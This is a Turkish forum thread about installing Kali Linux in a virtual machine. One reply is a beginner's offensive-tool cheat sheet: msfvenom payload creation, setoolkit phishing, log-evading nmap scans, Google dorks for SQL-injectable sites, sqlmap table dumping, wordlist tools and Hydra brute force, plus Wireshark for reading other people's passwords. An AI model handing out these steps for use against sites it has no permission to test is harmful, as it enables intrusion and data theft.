Çözüldü Kali Linux nasıl kurulur?

Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Çözüm
1-) VMware kullaniyorsan bunu, VirtualBox kullaniyorsan bunu indir.
2-) Indirdigin dosyayi sanal makine uzerine ekle.
3-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
4-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.

Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.

runit

Kilopat
Katılım
16 Temmuz 2020
Mesajlar
5.370
Makaleler
1
Çözümler
60
1-) VMware kullaniyorsan bunu, VirtualBox kullaniyorsan bunu indir.
2-) Indirdigin dosyayi sanal makine uzerine ekle.
3-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
4-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.

Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.
 
Son düzenleme:
Çözüm

Emre kırkaya

Centipat
Katılım
29 Mart 2020
Mesajlar
84
1-) VMware kullaniyorsan bunu, VirtualBox kullaniyorsan bunu indir.
2-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
3-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.

Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.
Kanka yazmışsın da adam hiç bir şey bilmiyorsa bunu nasıl yapsın
 
KS
KS
NightWist

NightWist

Hectopat
Katılım
16 Mayıs 2019
Mesajlar
2.460
Çözümler
6
Yer
Boşluk
Eğer;

"Ayyıldız tim haçking dersler Instagram metasploit bumbum" veya "turkhaçhingtim sqlmap site haçking uff Facebook haçking" veya arkadaşlarınla "adam ol karşim haçklenirsin" demek için yardım istiyorsanız yardım etmek pek istemem.

Aynen kardeşim tek işim Linux'ta heçkırlık yapmak.

Çok uzun internette videolar bulunuyordur Oracle VirtualBox kurcanda Linux ayarlarında netnetworku seçicen de çok uzun iş.

Denemek istiyorum Linux Mint, Pardus ve Kali Linux arasında kaldım.
 

SütaşAyran

Decipat
Katılım
17 Mart 2020
Mesajlar
1.241
Makaleler
2
Çözümler
2
Aynen kardeşim tek işim Linux'ta heçkırlık yapmak.



Denemek istiyorum Linux Mint, Pardus ve Kali Linux arasında kaldım.
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.

Kali Linux

METASPLOİT-FRAMEWORK İLE PENETRASYON TESTİ:

msfconsole >>> metasploit çalıştırır

show (payloads-exploits) >>> Payload veya Exploitleri görüntüler

msfvenom -p (payload adı) LHOST=(ip adresiniz) LPORT=(HERHANGİ BİR 4 HANELİ SAYI GİRİN) -f (format) > (dosyaadi).(format)

search (kelime) >>> aramak istediğiniz kelimeyi girin

use (exploit-payload adı)>>> exploit veya payloada girer

show options >>> ayarları görüntüler

run >>> tarama yapar

Bağlantı Kurulduğunda Meterpreter Konsolu Açılır

help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz

Maltego İle Sorgu;

maltego >>> maltegoyu çalıştırır

SOSYAL MÜHENDİSLİK

setoolkit >>> sosyal mühendislik kitini çalıştırır

Phishing v.b yapabilirsiniz.

SİTE ZAAFİYET TARAMASI:

1-)Fierce İle Keşif Yapma;

fierce -h >>> yardım almak için kullanılır

fierce --domain (sitealanadi) >>> site ip keşfi yapmak için kullanılır


2-)Wapiti İle Tarama;

wapiti -u (sitelinki) >>> Xss Veya Sql açığı bulursa bildirecektir.

3-)OwaspZap;

zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.

4-)Dirb İle Admin Panel Bulma;

dirb (sitelinki) >>> Admin Panel Bulmak İçin Kullanılır Genelde

5-)Nmap İle Site Zaafiyet Taraması Yapma;

İlk önce site ip adresini buluyoruz.Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve ip adresini kopyalıyoruz.Ardından

nmap (sitelinki) >>> genel tarama yapar

nmap -sS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar

nmap -O -sS (sitelinki) >>> log kayıtlarına takılmadan,OS sistemini öğrenerek tarama yapar

nmap -O -A -sS (sitelinki) >>> log kayıtlarına takılmadan,OS sistemini öğrenerek,işletim sistemini öğrenmeye çalışarak tarama yapar

nmap -O -A -sS -iL (dosya).txt >>> log kayıtlarına takılmadan,OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak,çoklu ip taraması yapar

6-) Whois İle Site Bilgilerini Öğrenme;

whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar

WORDLİST OLUŞTURMA

1-)Normal Wordlist Oluşturma;

crunch (min hane) (max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt

Örnek;

crunch 8 8 1234567890abcdefg -o liste.txt

2-)Sözlük (Site) Wordlisti Oluşturma;

cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)

Örnek;

cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste

3-) Kişiye Yönelik Wordlist Oluşturma;

İlk önce cupp aracını indiriyoruz

apt install cupp

Ardından

cupp -i

Sonra gereken bilgileri veriyoruz ve wordlist hazır

BRUTEFORCE SALDIRISI YAPMA

1-)Hydra İle Ssl Destekli Sitelere Saldırma;

hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz

(Başka Araçlarda Var Githubta mevcut)

AĞ İZLEME

1-) WireShark İle Ağ İzleme;

wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer http ise follow/TCP Stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(Detaylı Adli Bilişim Aracıdır Vaktinizi Alabilir)

2-)Kismet İle Ağınızda Kim Var Kim Yok Kontrol Edin;

kismet -c (ağ geçidinizi yazın örnek:wlan0,eth0) >>> bir link verecektir tarayıcınızda açın linux kullanıcı adınızı şifrenizi girin (root geçerlidir)

3-) Ettercap İle Ağ İzleme :

ettercap -g >>> ettercapı başlatır

SİTE SÖMÜRGECİLİK

1-)SQLMap İle Site Sömürgesi;

sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır

sqlmap -u (sitelinki) -D (database adı) --tables
>>> sitenin tablolarını araştırır

sqlmap -u (sitelinki) -D (database adı) -T (tablo adı) --columns >>> sitenin columnlarını araştırır

sqlmap -u (sitelinki) -D (database adı) -T (tablo adı) -C (column adı) --dump >>> size içeriği veya sonucu gösterir

Bu sadece SQL açıklı sitelerde geçerlidir.

Sql açıklı site nasıl bulunur???

Googlede dork aratarak bulabilirsiniz

Dorkları kendiniz yapsanız daha etkili sonuç alırsınız

Hazır Dorklar;

inurl:staff_id=
inurl:php?_id=
inurl:none_id=
inurl:me_id=
inurl:login?_id=

Sitede SQL açığı olduğunu nasıl anlarız???

Site linkinin sonuna (') işaretini koyarız eğer varsa ;

mysql_ ifadesi geçen bir hata alırız

BİLGİSAYARINIZI BİR WEB SUNUCUSU YAPIN!

service apache2 start-stop-restart >>> apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat

Bilgisayarınızın İP adresi sunucunuzun adresidir.İP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.

/var/www/html >>> buraya html dosyanızı atın ve tarayıcıya

ip adresiniz/(dosyanizin adi).html olarak aratın.Siteniz karşınıza gelecektir.

Örnek;

192.168.0.1/login.html

KALİ LİNUX GENEL KOMUTLAR:

shutdown -h (şimdi-now,saat-{örn. 21:00})>>>
Bilgisayarı kapatır

shutdown -r (şimdi-now,saat-{örn. 20:00})>>> bilgisayarı yeniden başlatır

ls >> dizin içeriğini görüntüler

cd (klasör) >> klasöre girer

cd .. >> klasörden çıkar

sudo >>> root değilken root işlem yapmayı sağlar

passwd (kullanıcı adı) >>> şifre değiştirir

apt-get update >> kali linux paketlerini yükseltir

apt-get upgrade >> kali linux paketlerini günceller

apt install (paketadı) >> paket yükler

apt-get install --reinstall (paket adı) >>> paketi baştan kurar

chmod +x (dosyaadi) >> dosyaya izin verir

chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.

chown -R root (dosyaismi) >> root yetkisi verir

cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar

mv (dosyaadi) (tasinacak dizin) >> dosya taşır

zip (dosyaadi) >> dosyayı arşivler

unzip (dosyaadi) >> dosyayı arşivden çıkarır

openvpn (dosyaismi) >>> vpn açar

KALİ LİNUX İP DEĞİŞTİRME

ifconfig yazın >>> ip adresiniz hakkında bilgilerinizi görüntüler

Yeni Terminal Açıp;

cd /etc/network/ >>> dizinine giriyoruz

nano interfaces >>> dosyayı düzenleyeceğiz

&(En Alt Satıra İnin)&

iface (ağ geçidiniz) inet static
(TabBasın)address (istediğiniz ip adresi yazın)
(TabBasın)netmask (ilk terminalde yazanı yaz)
(TabBasın)broadcast (ilk terminalde yazanı yaz)
(TabBasın)gateway (modem arayüz ipnizi yazın)

Ctrl+X basın Sonra (Y) Basın ve Enterlayın

Reboot yazın >>> sistemi yeniden başlatır

ifup (ağ geçidiniz örnek:wlan0,eth0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)

Not: eth0 da çalışacaktır wlan0da çalıştıramadım ama deneyin.

WEBSPLOİT

apt install websploit >>> websploit aracını kurar

websploit >>> websploit aracını çalıştırır

show modules >>> tüm modülleri gösterir

use (modül adı) >>> modüle girer

options >>> ayarları görüntüler

help >>> yardım almak için kullanılır

set (ayar) >>> ayarları düzenler

execute >>> başlatır

TERMİNETER KULLANIMI

apt install termineter >>> termineteri yükler

termineter >>> termineteri başlatır

show modules >>> modülleri görüntüler

use (modül) >>> modüle girer

show options >>> ayarları görüntüler

set (ayar) >>> ayar değiştirir

help >>> yardım almak için kullanılır

run >>> modülü başlatır


Lynis İle Sistem Güvenlik Taraması

git clone (indirme linki)>>> Lynis aracını github deposundan indiriyoruz

./lynis audit system >>> tarama başlatır

WPScan ile WordPress Site Taraması;

wpscan --url (sitelinki.com)
 
Yukarı